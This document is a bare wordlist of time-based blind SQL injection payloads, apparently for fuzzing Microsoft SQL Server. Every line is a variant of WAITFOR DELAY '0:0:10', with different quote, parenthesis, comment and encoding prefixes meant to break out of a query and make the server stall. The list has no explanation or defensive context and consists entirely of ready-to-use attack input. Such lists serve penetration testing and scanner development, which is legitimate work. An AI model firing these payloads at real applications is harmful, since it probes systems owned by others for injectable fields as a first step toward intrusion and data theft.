;waitfor delay '0:0:10'--
';WAITFOR DELAY '0:0:10'--
);waitfor delay '0:0:10'--
';waitfor delay '0:0:10'--
";waitfor delay '0:0:10'--
');waitfor delay '0:0:10'--
");waitfor delay '0:0:10'--
));waitfor delay '0:0:10'--
'));waitfor delay '0:0:10'--
"));waitfor delay '0:0:10'--
") IF (1=1) WAITFOR DELAY '0:0:10'--
';%5waitfor%5delay%5'0:0:10'%5--%5
' WAITFOR DELAY '0:0:10'--
' WAITFOR DELAY '0:0:10'
or WAITFOR DELAY '0:0:10'--
or WAITFOR DELAY '0:0:10'
and WAITFOR DELAY '0:0:10'--
and WAITFOR DELAY '0:0:10'
WAITFOR DELAY '0:0:10'
;WAITFOR DELAY '0:0:10'--
;WAITFOR DELAY '0:0:10'
1 WAITFOR DELAY '0:0:10'--
1 WAITFOR DELAY '0:0:10'
1 WAITFOR DELAY '0:0:10'-- 1337
1' WAITFOR DELAY '0:0:10' AND '1337'='1337
1') WAITFOR DELAY '0:0:10' AND ('1337'='1337
1) WAITFOR DELAY '0:0:10' AND (1337=1337
') WAITFOR DELAY '0:0:10'--
" WAITFOR DELAY '0:0:10'--
')) WAITFOR DELAY '0:0:10'--
'))) WAITFOR DELAY '0:0:10'--
%' WAITFOR DELAY '0:0:10'--
") WAITFOR DELAY '0:0:10'--
")) WAITFOR DELAY '0:0:10'--
"))) WAITFOR DELAY '0:0:10'--
1 waitfor delay '0:0:10'--
